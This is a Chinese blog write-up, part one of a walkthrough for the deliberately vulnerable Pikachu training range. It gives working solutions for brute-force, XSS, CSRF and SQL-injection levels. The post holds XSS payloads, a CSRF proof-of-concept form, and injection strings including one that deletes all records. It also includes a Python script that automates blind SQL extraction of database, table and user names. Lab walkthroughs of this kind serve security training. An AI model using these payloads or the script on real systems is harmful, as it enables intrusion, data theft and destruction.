谜团靶机writeup - Pikachu靶场通关指南-上

已于 2022-01-25 09:02:54 修改
阅读量3.2k 收藏 2
点赞数
分类专栏: 靶机练习 文章标签: 安全 web安全
于 2022-01-24 15:10:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zycdn/article/details/122368737
版权

暴力破解

用户名:admin、pikachu、test、vince、allen、kobe、grady、kevin、lucy、lili
密码:123456、000000、abc123

基于表单的暴力破解

Positions
基于表单的暴力破解Payloads
PayloadsStart attack
start attack

验证码绕过(on server)

在Repeater模块中发现验证码可以重复使用。
验证码绕过

验证码绕过(on client)

直接删除&vcode=G5KUQ
验证码绕过client

token防爆破点

将提取到的token填入第一次请求 以及 数据包中,并修改数据包中的用户、密码为字典中的第一个。【可以避免第一次请求的token失效】
token爆破

XSS:Cross-Site Scripting

反射型XSS(get)

GET /vul/xss/xss_reflected_get.php?message=<script>alert(1)</script>&submit=submit HTTP/1.1

反射性xss(post)

使用账号密码登录,然后发送数据。

POST /vul/xss/xsspost/xss_reflected_post.php HTTP/1.1
Host: 4af1c5bd5a334c128bc7ffbd68be0236.app.mituan.zone
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; UM_distinctid=17de0e3b15b9d7-0a6471d9226e2d-30614205-144000-17de0e3b15ca54; PHPSESSID=b3to3bnioj946mroaasga9g4eo
Connection: close

message=<script>alert(1)</script>&submit=submit

存储型XSS

<script>alert(1)</script><img src=a onerror=alert(1)>,提交即可。

DOM型xss

输入:javascript:alert(1)或者' onclick=alert(1)>,点击触发。

DOM型xss-x

输入:javascript:alert(1),点"请说出你的伤心往事"-“有些费劲心机”-“就让往事都随风”

XSS盲打

留言<script>alert(1)</script>,名称<img src=a onerror=alert(2)>,都可以触发。然后登录后台,使用admin、123456登录查看意见。

xss之过滤

输入<img src=# onerror=alert(1)>或者<scrIpt>alert(1)</scrIpt>

xss之htmlspecialchars

输入javascript:alert(1)或者' onclick='alert(1)

xss之href输出

输入javascript:alert(1)

xss之js输出

输入';alert(1)//

CSRF

vince/allen/kobe/grady/kevin/lucy/lili,密码全部是123456。

CSRF(get)

CSRF get

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://4af1c5bd5a334c128bc7ffbd68be0236.app.mituan.zone/vul/csrf/csrfget/csrf_get_edit.php">
      <input type="hidden" name="sex" value="11" />
      <input type="hidden" name="phonenum" value="22" />
      <input type="hidden" name="add" value="33" />
      <input type="hidden" name="email" value="44" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

使用vince登录,填写数据提交,抓包之后生成CSRF Poc保存为csrf.html,退出账号再使用allen登录,访问页面csrf.html即可。

CSRF(post)

跟上面类似。

CSRF Token

因有token,可以阻止CSRF。

Sql Inject

数字型注入

id=-1 union all select 1,user()&submit=%E6%9F%A5%E8%AF%A2
数字型注入

字符型注入

' or 1=1 #查询,或者抓包GET /vul/sqli/sqli_str.php?name=vince'+or+1%3d1%23&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1

搜索型注入

%或者%' or 1=1#能查出所有信息。

xx型注入

输入v') or 1=1#

insert/update注入

点击注册,输入222' or updatexml(1,concat(0x7e,'root',0x7e),3) or '222' or updatexml(1,concat(0x7e,'root',0x7e),3) or '1'='1构造一个用户字段,然后提交。
注册

delete注入

随便输入两条留言,在点击删除第一条的时候,拦截数据包,修改GET /vul/sqli/sqli_del.php?id=56+or+updatexml(1,concat(0x7e,user(),0x7e),3) HTTP/1.1即可形成报错注入。若修改为GET /vul/sqli/sqli_del.php?id=56+or+1=1 HTTP/1.1则会删除所有留言。

header注入

GET /vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 907c32e21ddb4858ae77907f204f72d0.app.mituan.zone
User-Agent: Mozilla/5.0' or updatexml(1,concat(0x7e,111,0x7e),3) or '1'='1
Accept: text/html' or updatexml(1,concat(0x7e,222,0x7e),3) or '
Cookie: ant[uname]=admin' or updatexml(1,concat(0x7e,333,0x7e),3) or '1'='1; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; UM_distinctid=17de0e3b15b9d7-0a6471d9226e2d-30614205-144000-17de0e3b15ca54; PHPSESSID=tuj0us8pkfqrk900h8kmf1f1kt
Connection: close

三个位置都可以。

盲注boolean

GET /vul/sqli/sqli_blind_b.php?name=vince'+and+length(database())>1%23&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
GET /vul/sqli/sqli_blind_b.php?name=vince'+and+substring(database(),1,1)='p'%23&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
GET /vul/sqli/sqli_blind_b.php?name=vince'+and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1))%3d108%23&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1

# python脚本
#
import requests
import re

# 需要参数内容
headers = {
    'User-Agent': 'Mozilla/5.0'
};
url = 'http://907c32e21ddb4858ae77907f204f72d0.app.mituan.zone/vul/sqli/sqli_blind_b.php';

# grammar = 'database()'
# 存储各个查询命令
grammars = ['database()', '(SELECT GROUP_CONCAT(DISTINCT TABLE_SCHEMA) FROM information_schema.TABLES)',
            '(SELECT GROUP_CONCAT(DISTINCT TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA="pikachu")',
            '(SELECT GROUP_CONCAT(DISTINCT COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA="pikachu")',
            '(SELECT GROUP_CONCAT(DISTINCT username) FROM pikachu.member)']
grammars = ['database()', '(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA="pikachu" limit 0,1)']
num = 0
# grammar = ''
# sql 语法不区分字母大小写
guess = 'abcdefghigklmnopqrstuvwxyz0123456789@_.,'


# 循环使用各个语句
def loop():
    for i in enumerate(grammars):
        print(i[1] + "-->", end='')
        grammar = i[1]
        parameter(grammar)
        print()


# 处理参数语句
def parameter(data):
    values = ''
    length = 0
    flag = False
    # 获取数据库名长度
    # for i in range(1, 100):
    #     # 检测当前数据库名长度
    #     # values = "lucy' and length(grammar)={num}#".format(num=i)
    #     # 拿到 information_schema.TABLES 的字段 TABLE_SCHEMA 下所有不重复值成组长度
    #     values = "lucy' and (SELECT length(GROUP_CONCAT(DISTINCT TABLE_SCHEMA)) FROM information_schema.TABLES)={num}#".format(
    #         num=i)
    #     # print(values)
    #     flag = query(values)
    #     if flag:
    #         print("数据库名长度:" + str(i))
    #         length = i
    #         # return i
    # for i in range(1, length + 1):
    flag = False
    isnum = 0
    for i in range(1, 1024):
        # for j in range(0, len(guess) + 1):
        for j in range(0, len(guess)):
            x = guess[j:j + 1]
            # print(x, end='')
            values = "lucy' and substring({grammar},{num},1)='{guess}'#".format(grammar=data, num=i,guess=x)
            flag = query(values)
            # print(flag)
            if flag:
                print(x, end='')
                break
        # 不先获取数据长度的后果,继续做值爆破完成判断
        # print('-' + str(isnum),end='')
        # print(bool(1-flag),end='')
        if bool(1 - flag):
            # print('ni-' + x + '-ni' + str(i))
            isnum = isnum + 1
        if isnum == 2:
            break
        # flag = False
        # print()
        # print(values)


# 弄个请求函数
def query(values):
    params = {
        'name': values,
        'submit': '查询'
    }
    response = requests.get(url=url, headers=headers, params=params);
    query_text = response.text
    # print(query_text)
    #
    # 使用xpath
    # tree = etree.HTML(query_text)
    # tree_str = tree.xpath('//div/p[@class="notice"]/text()')
    # print(tree_str[0])
    #
    # 使用正则
    ex = "<p class='notice'>(.*?) uid:.*?</p>"
    judge = re.findall(ex, query_text, re.S)
    # print(judge)
    if len(judge) == 0:
        return False
    else:
        return True


if __name__ == "__main__":
    # print(values)
    # query()
    # parameter()
    loop()
    input('\n请输入任意键退出!!!')

布尔注入

盲注time

输入vince' and sleep(2)#,发现等待两秒返回。
时间盲注GET /vul/sqli/sqli_blind_t.php?name=vince'+and+if((length(database())%3d7),sleep(2),1)--+q&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1,延时2s返回数据,表明数据库名称长度7,剩下的就是猜测表名、字段名、数据。

宽字节注入

魔术引号会在单双引号、反斜线、NULL前添加转义字符,从而造成普通字符串造成无法闭合问题。可以采用汉字或者%df方式绕过。
输入汉' or 1=1#查询。【name=%E6%B1%89%27+or+1%3D1%23&submit=%E6%9F%A5%E8%AF%A2】
或者输入abc' or 1=1#查询,抓包后修改为name=abc%df%27+or+1%3D1%23&submit=%E6%9F%A5%E8%AF%A2【在单引号前加%df】。

其他

谜团靶机平台地址
布尔注入代码

zycdn
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
谜团XSS靶场1-10关解析
wang649的博客
11-27 1016
谜团XSS靶场1-7关解析 谜团靶场 简介 前两天觉得自己之前写的博客实在是不行,讲的东西都太基础了,都是千篇一律的内容,这方面的内容也比较难讲好,很多细节方面的东西我自己都不会,索性直接删去这部分内容重新开篇,直接进入实战(打靶机),这样在写博客的同时也不会因为写一篇基础性的文章时间太长而导致没有时间去练手,好了废话说到这里,开始打靶。 第一关 首先进到页面,页面什么输入框都没有,但是图片上告诉我们it’s easy 那我们就按照他图片上的走,既然他说了简单,那就直接在URL中进行xss注入 ?name
谜团XSS靶场15-20关解析
wang649的博客
01-23 633
谜团XSS靶场15-20关解析 谜团靶场 第十六关 进到页面查看源代码后发现 参数是keyword,并且参数输出在<center>标签之间。先不急,首先还是尝试有没有过滤掉什么内容”’<script>()alert,on,href,src 随后我们发现只有script被过滤掉了,因此这边我们不能尝试再使用<script>alert(1)</script>的方式进行简单的注入。 这边尝试换一种方式进行注入,既然输出是在标签内部那么我们可以使用<img&
谜团靶机writeup - Pikachu靶场通关指南-下
小龙人
01-25 2844
谜团靶机writeup - Pikachu靶场通关指南-下
pikachu靶场通关全流程
最新发布
braty_的博客
06-08 1085
web安全新手靶场,,过程详细,,萌新易学
Pikachu SQL Writeup
qq_43647462的博客
11-12 263
Pikachu SQL Writeup Buchiyexiao 由于个人懒狗外加课程压力较大,所以很多(所有)题目都是只是找到注入点得到一些基础的信息而不进行对数据库信息的进一步挖掘,SQL-Inject模块题目相对较为简单,基本上不太需要工具就可以手工完成注入 数字型注入POST 题干清晰,Hackbar返回数据,两个post型变量,一个id一个submit,注入点明显在id,数字型,直接测or,or 1=1 #直接回显信息 字符型注入GET 原理同上,bcyx’ or 1=1 #得信息 搜索型注入 乍
谜团靶机writeup - DVWA-高等级靶场通关指南
小龙人
01-10 1112
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 谜团靶机平台地址:https://mituan.zone/ 选择靶机 初始化靶场,此次选择DVWA高等级靶场。 Brute Force 抓包后,注意修改token,初始token为Extract请求数据包中的token,线程为1。 Command Inje.
CISP-PTE靶场(win+centos).zip
03-13
CISP-PTE靶场是一个针对信息安全专业人员进行渗透测试与应急响应能力训练的平台,它涵盖了Windows和Linux两种操作系统环境。这个压缩包包含了两个不同系统的靶场环境:win2003和CentOS,以及一个关于如何搭建CISP-...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
pikachu渗透靶场&Web安全从入门到放弃】之 XSS 跨站脚本漏洞
algae
04-27 178
谜团靶机writeup - DVWA-中等级靶场通关指南
小龙人
01-07 999
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 谜团靶机平台地址:https://mituan.zone/ 选择靶机 初始化靶场,此次选择DVWA中等级靶场。 Brute Force 跟初级相比进行了mysqli_real_escape_string的过滤,因此无法注入,只能暴力了。 发现payload.
谜团靶机writeup - DVWA-低等级靶场通关指南
小龙人
01-06 2313
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 谜团靶机平台地址:https://mituan.zone/ 注册选择靶机 注册登录之后可以看到有很多靶机,选择本次的目标-DVWA。 点击开始练习 点击打开按钮 在新打开的页面中输入admin password登录,进行靶场初始化。 初始化完成之后,重.
安全】P 4-1 XSS跨站脚本分类
Z_David_Z的博客
02-17 282
目录0X01 XSS漏洞介绍0X02 反射型XSS0X03 存储型XSS0X04 DOM型XSS 0X01 XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 0X02 反射型XSS 反射型XSS又称非持久性XSS,这种攻击
CSRF漏洞挖掘
qq_22132931的博客
02-14 701
CSRF漏洞挖掘
mysql查询重复数据
Sunshine_hj的博客
09-09 678
查询重复字段 SELECT * FROM 表 a WHERE (( SELECT COUNT(*) FROM 表 WHERE 字段= a.字段) > 1 ) ORDER BY 字段DESC 删除重复字段 DELETE FROM 表 WHERE 字段IN ( SELECT 字段 FROM ( SELECT 字段FROM 表GROUP BY 字段HAVING Count(*)> 1 ) a ) ...
pikachu靶场通关详解
ekmgrwaetaetawt的博客
08-03 111
pikachu靶场通关详解
pikachu靶场通关WP
cynthrial的博客
06-11 9558
pikachu靶场通关WP暴力破解基于表单的暴力破解验证码绕过(on server)验证码绕过(on client)token防爆破?Cross-Stie Scripting反射型xss(get)反射型xss(post)存储型xssDom型xssDom型xss-xXSS盲打XSS过滤XSS之htmlspecialcharsXSS之hrefXSS之JS输出CSRFCSRF(get)CSRF(POST)CSRF 防范增加token验证关于安全的会话管理(避免会话被利用)访问控制安全管理增加验证码SQL注入数
VulnHub入门教程:DC-1靶场攻破指南
靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux 命令行以及基本的渗透测试工具使用经验,如 Kali Linux 或 Parrot Security OS 上的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值